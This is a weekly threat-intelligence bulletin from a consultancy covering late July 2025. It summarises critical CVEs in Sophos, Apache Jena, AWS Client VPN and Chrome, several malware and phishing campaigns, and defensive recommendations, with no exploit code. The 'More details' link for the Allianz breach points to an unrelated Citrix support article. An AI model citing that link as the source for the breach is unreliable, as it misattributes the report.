Global Site
Argentina Aruba Barbados Bolivia Brazil Canada Cayman Islands Chile Colombia Costa Rica Curacao El Salvador Guatemala Honduras Mexico Paraguay Peru Puerto Rico Saint Martin Suriname United States Uruguay Venezuela
Australia Cambodia China Hawaii Hong Kong India Indonesia Japan Macau Malaysia Maldives Mongolia Myanmar Nepal New Zealand Pakistan Philippines Singapore South Korea Sri Lanka Taiwan Thailand Vietnam
Albania Andorra Armenia Austria Azerbaijan Belgium Bulgaria Croatia Cyprus Czech Republic Denmark Estonia Finland France Georgia Germany Greece Hungary Ireland Italy Kazakhstan Kosovo Latvia Lithuania Luxembourg Malta Moldova Netherlands Norway Poland Portugal Romania Serbia Slovakia Slovenia Spain Sweden Switzerland Tajikistan Turkey Ukraine United Kingdom Uzbekistan
Algeria Angola Bahrain Egypt Ghana Israel Jordan Kenya Kuwait Lebanon Liberia Mauritius Morocco Mozambique Nigeria Oman Qatar Saudi Arabia Senegal Sierra Leone South Africa Tanzania Togo Tunisia Uganda United Arab Emirates Yemen
Contact Us
home News
Top Cyber Threats During: 21st July – 27th July 2025

Top Cyber Threats During: 21st July – 27th July 2025

7/29/2025
Top Cyber Threats During: 21st July – 27th July 2025

In today’s evolving threat landscape, staying ahead of cybersecurity risks requires timely intelligence and proactive defense. This week's bulletin highlights multiple critical vulnerabilities across widely used platforms such as Sophos Firewall, Google Chrome, AWS Client VPN, and Apache Jena, all demanding urgent attention and patching. We also cover major attack campaigns including the Allianz Life Insurance data breach, sophisticated CastleLoader malware infections, and new techniques like UI Automation abuse by Coyote malware. From developer-targeted phishing in the npm ecosystem to cyber espionage campaigns against government and military entities, this edition provides a comprehensive snapshot of emerging risks and practical mitigation strategies to help organizations enhance their security posture.

Section 1: Critical Vulnerabilities to Patch Immediately

1. Sophos Firewall – Remote Code Execution (RCE) Flaws

Sophos has disclosed two critical vulnerabilities (CVE-2025-6704 and CVE-2025-7624) in older versions of its Firewall (prior to v21.0 MR2), carrying a CVSS score of 9.8.
These flaws can allow unauthenticated remote attackers to execute arbitrary code, especially if Secure PDF eXchange (SPX) is enabled and the firewall is configured in High Availability (HA) mode. Organizations still using outdated firmware should patch immediately to avoid compromise via email or malicious file injections.
More details: https://www.sophos.com/en-us/security-advisories/sophos-sa-20250721-sfos-rce

2. Apache Jena Fuseki Server – File Access and Directory Traversal

Two vulnerabilities (CVE-2025-49656 & CVE-2025-50151) affect Apache Jena up to v5.4.0, with CVSS scores of 7.5 and 8.8 respectively. These issues allow administrative users to write or access arbitrary files on the server, potentially exposing logs, sensitive configurations, or enabling file poisoning.
While they require valid credentials, these flaws are dangerous in insider or compromised admin scenarios. Immediate upgrade to Apache Jena 5.5.0 is recommended.

More details: https://jena.apache.org/security/advisories.html

3. AWS Client VPN for Windows – Local Privilege Escalation

CVE-2025-8069 exposes a design flaw in several versions of the AWS Client VPN for Windows. The installer references a user-writable directory for OpenSSL configs, which can be hijacked by a local user to execute malicious code with SYSTEM privileges.
Though the flaw affects only Windows, its exploitation in shared or corporate environments can lead to full system compromise. Fixed in version 5.2.2.

More details: https://aws.amazon.com/security/security-bulletins/AWS-2025-014/

4. Google Chrome – Emergency Update to Fix Code Execution Bugs

Two high-severity vulnerabilities (CVE-2025-8010 & CVE-2025-8011) in Chrome’s V8 JavaScript engine were patched in an emergency release. These bugs allow attackers to execute arbitrary code via malicious HTML, possibly bypassing sandbox protections and gaining OS-level access.
All users are urged to update Chrome to v138.0.7204.168/.169, and Chromium-based browser users (Edge, Opera, Brave) should watch for security updates.

More details: https://chromereleases.googleblog.com/2025/07/stable-channel-update-for-desktop_22.html

Section 2: Emerging Threat Campaigns

Allianz Life Insurance Data Breach

A major breach affected 1.4 million customers of Allianz Life Insurance, reportedly due to compromise of a third-party cloud CRM system.
Initial investigation points to social engineering by the Scattered Spider group. While internal systems remain untouched, the exposed data includes customer contact details and potentially Social Security numbers.
Allianz is offering 24 months of identity protection and has notified law enforcement. This incident underscores the importance of vendor risk management and multi-factor authentication (MFA).

More details: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 

CastleLoader Malware – A Sophisticated Phishing Campaign

CastleLoader is a new malware loader that has used Cloudflare-branded phishing pages to lure users into executing clipboard-injected PowerShell scripts.
Deceptively posing as developer tools or browser updates, it silently delivers payloads like RedLine, StealC, and HijackLoader.
The technique involves tricking users to paste clipboard content into Run (Win+R), leading to full compromise. IT teams are advised to disable PowerShell where unnecessary, implement EDR, and conduct phishing awareness training.

More details: https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview

Section 3: Security Headlines You Shouldn’t Miss

Coyote Malware Exploits Microsoft UI Automation

The Coyote banking trojan now abuses Microsoft’s legitimate UI Automation framework to exfiltrate login credentials from users—even if traditional EDR tools are in place.
It stealthily parses browser UI to extract URLs, bypassing usual API-based monitoring. Currently targeting Brazilian banks and exchanges, this marks the first known in-the-wild UIA exploit.

More details: https://www.akamai.com/blog/security-research/active-exploitation-coyote-malware-first-ui-automation-abuse-in-the-wild

npm Phishing Campaign Targets Developers

Cybercriminals are spoofing npmjs.com using a typosquatted domain, npnjs.com, to harvest credentials of JavaScript developers via phishing emails.
The attackers managed to inject malicious code into legitimate npm packages by compromising high-profile maintainers. Developers are urged to enable 2FA, rotate tokens, and verify URLs before logging in.

More details: https://socket.dev/blog/npm-phishing-email-targets-developers-with-typosquatted-domain

Hive0156 Targets Ukrainian Government with Advanced Espionage

The Russian-aligned group Hive0156 has ramped up attacks on Ukrainian military and government entities using Remcos RAT delivered via weaponized documents and LNK files.
The attack chain includes HijackLoader delivered through PNG steganography. Their evolving tactics now target civilians, reflecting sophisticated social engineering and stealth persistence mechanisms.

More details: https://www.ibm.com/think/x-force/hive0156-continues-remcos-campaigns-against-ukraine

Recommended Actions This Week

  • Patch critical vulnerabilities in Sophos, Chrome, AWS, and Apache Jena products.
  • Audit privileged installations and restrict access to vulnerable installers.
  • Educate employees about advanced phishing (e.g., Cloudflare and GitHub lures).
  • Monitor clipboard and PowerShell activity, especially in developer or shared environments.
  • Strengthen EDR detection rules to flag UI Automation abuse or DLL injection attempts.

Stay informed, stay secure.
Subscribe to receive weekly alerts, advisories, and actionable insights directly in your inbox. For consultation and for tailored cybersecurity advisory, contact our Cyber Threat Management team at Crowe UAE,

+971 55 343 8693, [email protected]